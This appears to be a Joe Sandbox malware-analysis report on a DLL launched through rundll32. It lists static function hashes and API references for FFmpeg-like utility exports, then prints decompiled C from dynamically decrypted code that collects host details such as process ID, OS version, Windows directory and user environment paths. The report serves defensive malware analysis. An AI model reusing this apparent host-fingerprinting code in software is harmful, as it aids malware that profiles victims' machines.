Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_fifo_can_readmv_fifo_can_writemv_fifo_grow2mv_realloc_arraymv_samples_get_buffer_size
String ID:
API String ID: 78108474-0
Opcode ID: 16ee73bcc62b132f1e54a42e7e71ebc810354682a887e12c02217443e12b8a1b
Instruction ID: ce1007827096595f26e8808010e9ccaaa56d4b232a4da4f197e7c45d59299025
Opcode Fuzzy Hash: 16ee73bcc62b132f1e54a42e7e71ebc810354682a887e12c02217443e12b8a1b
Instruction Fuzzy Hash: 7811E378A093559FD700DF69D58094ABBE4FF88394F01892DFD88CB314E774E9458B92

Uniqueness

Uniqueness Score: -1.00%

Function 1001B7E0 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

mv_buffer_alloc.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B7F0

Part of subcall function 10009DC0: mv_malloc.F072 ref: 10009DDC
Part of subcall function 10009DC0: mv_mallocz.F072 ref: 10009DF2
Part of subcall function 10009DC0: mv_mallocz.F072 ref: 10009E25

mv_realloc.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B820

Part of subcall function 10028DA0: _aligned_realloc.MSVCRT ref: 10028DCB

mv_mallocz.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B836
mv_buffer_unref.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B87F

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$_aligned_reallocmv_buffer_allocmv_buffer_unrefmv_mallocmv_realloc
String ID:
API String ID: 547404713-0
Opcode ID: b90091ae49065f10d06a1fd9b8fc383fcac2e01a729e366898664da81a12ee34
Instruction ID: e7377a26eb348f0c440ff820f9fbcfd740b0c451e73ef676c70969cbd66757a6
Opcode Fuzzy Hash: b90091ae49065f10d06a1fd9b8fc383fcac2e01a729e366898664da81a12ee34
Instruction Fuzzy Hash: 9F1128B49087418FD750DF25D48068AFBE4FF48290F55896EE99A8B311EB30E881CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10007050 Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

mv_bprint_init.F072 ref: 10007076
mv_bprint_escape.F072 ref: 100070AA

Part of subcall function 10009730: mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB

mv_bprint_finalize.F072 ref: 100070C7

Part of subcall function 10009690: mv_realloc.F072(?,?,?,?,?,?,10006D57), ref: 100096C9

mv_bprint_finalize.F072 ref: 100070F1

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_finalize$mv_bprint_escapemv_bprint_initmv_bprintfmv_realloc
String ID:
API String ID: 2707718180-0
Opcode ID: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
Instruction ID: 7786e306f37471b19b8e033861bf3e046f7241f8be26b7eb16500715b45264db
Opcode Fuzzy Hash: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
Instruction Fuzzy Hash: 9F116DB4A093408BD360DF28C18065EBBE0BF88254F908E2DBA9C87345E635A944CB06

Uniqueness

Uniqueness Score: -1.00%

Function 1001140B Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

mv_freep.F072 ref: 10011416
mv_freep.F072 ref: 10011422

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep
String ID:
API String ID: 2373662943-0
Opcode ID: b8978aa5356de5e0d0452b52506a000fc5e3e76e5db4869c3fd5d98213d9114f
Instruction ID: 289599a6c336a5d98a65091fe60646c07369103d16afa4f254b85444868d10c6
Opcode Fuzzy Hash: b8978aa5356de5e0d0452b52506a000fc5e3e76e5db4869c3fd5d98213d9114f
Instruction Fuzzy Hash: 86E079795087188FC600EB68948191AB7F0EB89284F854C1DE9C4A7302D675E940CA82

Uniqueness

Uniqueness Score: -1.00%

Function 100997D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 10099851

Strings

NaN, xrefs: 100997D1

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 398facde90d3158e8c562ce5a90c2f8271193d3b0513a851222c672f3db81691
Instruction ID: efb825897de6c10b198cf50540e6450b8c187f7e27a86bc41c00ac793e9681bb
Opcode Fuzzy Hash: 398facde90d3158e8c562ce5a90c2f8271193d3b0513a851222c672f3db81691
Instruction Fuzzy Hash: B6410771A052168BDB14CF1DC484796B7E1EF86754B2AC2A9DC8C8F24AD732EC42DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10022390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

Assertion %s failed at %s:%d, xrefs: 100224BA

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_get_cpu_flags
String ID: Assertion %s failed at %s:%d
API String ID: 185405932-2766368343
Opcode ID: 6c1046a228a6480c7155eb2475d82291d57ca262918e156c95d3f1e11567d0db
Instruction ID: 9000e0a9215e96f19705fc5f92f59cb8436bb03ac98e3bf4af9b514e39ffaf03
Opcode Fuzzy Hash: 6c1046a228a6480c7155eb2475d82291d57ca262918e156c95d3f1e11567d0db
Instruction Fuzzy Hash: 454112B5A08381AFC740DF94D58051EFBF1FF88740F91891DE99997300D7BAEA858B42

Uniqueness

Uniqueness Score: -1.00%

Function 100224F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

mv_log.F072 ref: 100225E1
abort.MSVCRT ref: 100225E6

Strings

Assertion %s failed at %s:%d, xrefs: 100225D0

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: abortmv_log
String ID: Assertion %s failed at %s:%d
API String ID: 2075109169-2766368343
Opcode ID: 96ccb67a9ced400229960c739ff5e4974aafcccf3633072cb66a9d878579e67e
Instruction ID: 11814923a7bf7540ef128da13c98316d9c3b81b6007f7c64051ac5900c87ea26
Opcode Fuzzy Hash: 96ccb67a9ced400229960c739ff5e4974aafcccf3633072cb66a9d878579e67e
Instruction Fuzzy Hash: 5C318D75A08B219BC708CF90E5A452EFBF1EFC1750FD1841CE98957200D77A9984CB82

Uniqueness

Uniqueness Score: -1.00%

Function 100221C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

mv_image_get_linesize.F072 ref: 10022203

Part of subcall function 10021480: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496

Strings

Picture size %ux%u is invalid, xrefs: 1002228D

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_image_get_linesizemv_pix_fmt_desc_get
String ID: Picture size %ux%u is invalid
API String ID: 645864070-1963597007
Opcode ID: 0946b3bcac33ba6fca7acdb6ca24e0fe7ad52919dc498f119e2a3142e05806b9
Instruction ID: c32bc821c07fb99167277532678e70ae68b76ab36c526d85f24e74df5a32105a
Opcode Fuzzy Hash: 0946b3bcac33ba6fca7acdb6ca24e0fe7ad52919dc498f119e2a3142e05806b9
Instruction Fuzzy Hash: C7215E75A083559FC704CF69C48020EFBE1FBC8710F958A2EF9A897350D7B5E9048B46

Uniqueness

Uniqueness Score: -1.00%

Function 1000C461 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.F072 ref: 1000C4A8
mv_bprintf.F072 ref: 1000C4D0

Strings

none, xrefs: 1000C4C7

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: none
API String ID: 2490314137-2140143823
Opcode ID: fb99da9c4718ad6228832967d969a5fa7994f6f45e19e41f4cd0f504848537d0
Instruction ID: a25a21bf0bbbab6eb8dd7b885bea08568b6db38ddaeda7311d16c5a577b3c9a6
Opcode Fuzzy Hash: fb99da9c4718ad6228832967d969a5fa7994f6f45e19e41f4cd0f504848537d0
Instruction Fuzzy Hash: 910186B4904B568BD720DF24D880B9BB3E4FFC4384F52492DEA9853245D330BD858B93

Uniqueness

Uniqueness Score: -1.00%

Function 10012408 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

mv_strlcatf.F072 ref: 10012429

Part of subcall function 100067F0: strlen.MSVCRT ref: 1000680A

mv_dict_set.F072 ref: 1001244D

Strings

.%06dZ, xrefs: 10012419

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_setmv_strlcatfstrlen
String ID: .%06dZ
API String ID: 1014950348-3752268379
Opcode ID: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
Instruction ID: 95eb8ff42823485582616919598dcae06947ee25e4005e9b3a20f874dc0564a5
Opcode Fuzzy Hash: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
Instruction Fuzzy Hash: DAE04EB5908740AFD714DF29E48175ABBE0FB88354F51C82EB49C97306D63898418B46

Uniqueness

Uniqueness Score: -1.00%

Function 1001E814 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

mv_image_check_size.F072 ref: 1001E85A
mv_calloc.F072 ref: 1001E8B9
mv_frame_alloc.F072 ref: 1001E924
mv_frame_free.F072 ref: 1001E96B
mv_freep.F072 ref: 1001E97C
mv_get_pix_fmt_name.F072 ref: 1001E9EE
mv_log.F072 ref: 1001EA15

Strings

The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001EA03

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_callocmv_frame_allocmv_frame_freemv_freepmv_get_pix_fmt_namemv_image_check_sizemv_log
String ID: The hardware pixel format '%s' is not supported by the device type '%s'
API String ID: 473889652-379977042
Opcode ID: 61d72b4d4c2e0655fcbe5d0e6275bddd9b2c6f8c5749a3447ccd53c07b7555cd
Instruction ID: 4d1730ca70439439150dc69e2c3e69577fa63277b803d74fdee23c8a3be9cec6
Opcode Fuzzy Hash: 61d72b4d4c2e0655fcbe5d0e6275bddd9b2c6f8c5749a3447ccd53c07b7555cd
Instruction Fuzzy Hash: 56F01978608B418FC710DF28C58051EBBE0EB49720F518A59EAA99B395DB34EC80DB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5400, Parent PID: 4332COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.1%
Total number of Nodes:	1433
Total number of Limit Nodes:	4

Executed Functions

Function 0494BB4D Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0494BB4D(void* __edx, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t70;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr* _t79;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t89;
				intOrPtr _t91;
				void* _t92;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t104;
				short _t109;
				char _t111;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t122;
				intOrPtr _t126;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t141;
				intOrPtr _t144;
				intOrPtr _t146;
				intOrPtr _t152;
				void* _t153;
				WCHAR* _t154;
				char* _t155;
				intOrPtr _t166;
				intOrPtr _t182;
				void* _t198;
				struct _OSVERSIONINFOA* _t199;
				void* _t200;
				void* _t202;
				char _t205;
				void* _t206;
				char* _t207;
				void* _t210;
				int* _t211;
				void* _t224;

				_t224 = __fp0;
				_t152 =  *0x4960fa8; // 0x4940000
				_t70 = E0494911F(0x1ac4);
				_t199 = _t70;
				if(_t199 != 0) {
					 *((intOrPtr*)(_t199 + 0x1640)) = GetCurrentProcessId();
					_t72 =  *0x4960fa0; // 0x49ff8a0
					_t73 =  *((intOrPtr*)(_t72 + 0xb0))(_t200);
					_t3 = _t199 + 0x648; // 0x648
					E04954A2A( *((intOrPtr*)(_t199 + 0x1640)) + _t73, _t3);
					_t75 =  *0x4960fa0; // 0x49ff8a0
					_t5 = _t199 + 0x1644; // 0x1644
					_t201 = _t5;
					_push(0x105);
					_push(_t5);
					_push(0);
					if( *((intOrPtr*)(_t75 + 0x12c))() != 0) {
						 *((intOrPtr*)(_t199 + 0x1854)) = E04949547(_t201);
					}
					_t77 =  *0x4960fa0; // 0x49ff8a0
					_t79 = E0494DC33( *((intOrPtr*)(_t77 + 0x130))()); // executed
					 *((intOrPtr*)(_t199 + 0x110)) = _t79;
					_t163 =  *_t79;
					if(E0494DDAE( *_t79) == 0) {
						_t81 = E0494DC83(_t163, _t201); // executed
						__eflags = _t81;
						_t166 = (0 | _t81 > 0x00000000) + 1;
						__eflags = _t166;
						 *((intOrPtr*)(_t199 + 0x214)) = _t166;
					} else {
						 *((intOrPtr*)(_t199 + 0x214)) = 3;
					}
					_t14 = _t199 + 0x220; // 0x220, executed
					_t82 = E0494E5A6(_t14); // executed
					 *((intOrPtr*)(_t199 + 0x218)) = _t82;
					_t83 = E0494E56B(_t14); // executed
					 *((intOrPtr*)(_t199 + 0x21c)) = _t83;
					_t17 = _t199 + 0x114; // 0x114
					_t202 = _t17;
					 *((intOrPtr*)(_t199 + 0x224)) = _t152;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t202);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x110)))));
					_t89 =  *0x4960fc8; // 0x49ffb00
					_push(0); // executed
					if( *((intOrPtr*)(_t89 + 0x6c))() == 0) {
						GetLastError();
					}
					_t91 =  *0x4960fc0; // 0x49ffa38
					_t92 =  *((intOrPtr*)(_t91 + 0x3c))(0x1000);
					_t28 = _t199 + 0x228; // 0x228
					_t153 = _t28;
					 *(_t199 + 0x1850) = 0 | _t92 > 0x00000000;
					if( *0x4960fa4 != 2) {
						E0494BA56( *((intOrPtr*)(_t199 + 0x224)), _t153);
					} else {
						E0494BB20(_t153);
					}
					_t94 =  *0x4960fa4; // 0x1
					 *((intOrPtr*)(_t199 + 0xa0)) = _t94;
					_t219 = _t153;
					if(_t153 != 0) {
						 *((intOrPtr*)(_t199 + 0x434)) = E04949547(_t153);
					}
					_t95 = E0494D130();
					_t35 = _t199 + 0xb0; // 0xb0
					_t203 = _t35;
					 *((intOrPtr*)(_t199 + 0xac)) = _t95;
					_t96 = E0494CF1D(_t35, _t219, _t224);
					_t37 = _t199 + 0xd0; // 0xd0
					E049498A9(_t96, _t35, _t37);
					_t38 = _t199 + 0x438; // 0x438
					E0494955E(_t153, _t38);
					_t100 = E0494E605(_t203, E0494CE25(_t35), 0);
					_t39 = _t199 + 0x100c; // 0x100c
					E0494D146(_t100, _t39, _t224);
					_t102 =  *0x4960fa0; // 0x49ff8a0
					_t104 = E0494DE00( *((intOrPtr*)(_t102 + 0x130))(_t202)); // executed
					 *((intOrPtr*)(_t199 + 0x101c)) = _t104;
					E049492A2(_t199, 0, 0x9c);
					_t211 = _t210 + 0xc;
					_t199->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t199);
					 *((intOrPtr*)(_t199 + 0xa8)) = E0494B85A(_t103);
					_t109 = E0494B883(_t108);
					_t43 = _t199 + 0x1020; // 0x1020
					_t154 = _t43;
					 *((short*)(_t199 + 0x9c)) = _t109;
					GetWindowsDirectoryW(_t154, 0x104);
					_t111 = E049490EA(_t108, 0x83);
					_t182 =  *0x4960fa0; // 0x49ff8a0
					_t205 = _t111;
					 *_t211 = 0x104;
					_push( &_v668);
					_push(_t205);
					_v8 = _t205;
					if( *((intOrPtr*)(_t182 + 0xf0))() == 0) {
						_t146 =  *0x4960fa0; // 0x49ff8a0
						 *((intOrPtr*)(_t146 + 0x10c))(_t205, _t154);
					}
					E04949D66( &_v8);
					_t116 =  *0x4960fa0; // 0x49ff8a0
					_t50 = _t199 + 0x1434; // 0x1434
					_t206 = _t50;
					 *_t211 = 0x209;
					_push(_t206);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t116 + 0xf0))() == 0) {
						E0494C08E(_t206, 0x105, L"%s\\%s", _t154);
						_t144 =  *0x4960fa0; // 0x49ff8a0
						_t211 =  &(_t211[5]);
						 *((intOrPtr*)(_t144 + 0x10c))(L"USERPROFILE", _t206, "TEMP");
					}
					_push(0x20a);
					_t53 = _t199 + 0x122a; // 0x122a
					_t155 = L"TEMP";
					_t119 =  *0x4960fa0; // 0x49ff8a0
					_push(_t155);
					if( *((intOrPtr*)(_t119 + 0xf0))() == 0) {
						_t141 =  *0x4960fa0; // 0x49ff8a0
						 *((intOrPtr*)(_t141 + 0x10c))(_t155, _t206);
					}
					_push(0x40);
					_t207 = L"SystemDrive";
					_push( &_v144);
					_t122 =  *0x4960fa0; // 0x49ff8a0
					_push(_t207);
					if( *((intOrPtr*)(_t122 + 0xf0))() == 0) {
						_t139 =  *0x4960fa0; // 0x49ff8a0
						 *((intOrPtr*)(_t139 + 0x10c))(_t207, L"C:");
					}
					_v8 = 0x7f;
					_t61 = _t199 + 0x199c; // 0x199c
					_t126 =  *0x4960fa0; // 0x49ff8a0
					 *((intOrPtr*)(_t126 + 0xc0))(_t61,  &_v8);
					_t64 = _t199 + 0x100c; // 0x100c
					E04954A2A(E0494E605(_t64, E0494CE25(_t64), 0),  &_v2644);
					_t65 = _t199 + 0x1858; // 0x1858
					E049549FC( &_v2644, _t65, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t68 = _t199 + 0x1878; // 0x1878
					_t198 = 0x14;
					E0494962B(_t68, _t198);
					_t137 = E0494B501(_t68, _t198); // executed
					 *((intOrPtr*)(_t199 + 0x1898)) = _t137;
					return _t199;
				}
				return _t70;
			}

0x0494bb4d
0x0494bb57
0x0494bb63
0x0494bb68
0x0494bb6d
0x0494bb7a
0x0494bb80
0x0494bb85
0x0494bb8b
0x0494bb9b
0x0494bba0
0x0494bba5
0x0494bba5
0x0494bbad
0x0494bbb2
0x0494bbb3
0x0494bbbd
0x0494bbc6
0x0494bbc6
0x0494bbcc
0x0494bbd9
0x0494bbde
0x0494bbe4
0x0494bbed
0x0494bbfb
0x0494bc02
0x0494bc07
0x0494bc07
0x0494bc08
0x0494bbef
0x0494bbef
0x0494bbef
0x0494bc0e
0x0494bc14
0x0494bc19
0x0494bc1f
0x0494bc24
0x0494bc2a
0x0494bc2a
0x0494bc33
0x0494bc39
0x0494bc3d
0x0494bc44
0x0494bc4b
0x0494bc52
0x0494bc56
0x0494bc5d
0x0494bc5e
0x0494bc60
0x0494bc65
0x0494bc6c
0x0494bc6e
0x0494bc6e
0x0494bc74
0x0494bc7e
0x0494bc83
0x0494bc83
0x0494bc8e
0x0494bc9b
0x0494bcae
0x0494bc9d
0x0494bc9f
0x0494bc9f
0x0494bcb3
0x0494bcb8
0x0494bcbe
0x0494bcc0
0x0494bcc9
0x0494bcc9
0x0494bcd1
0x0494bcd6
0x0494bcd6
0x0494bcdc
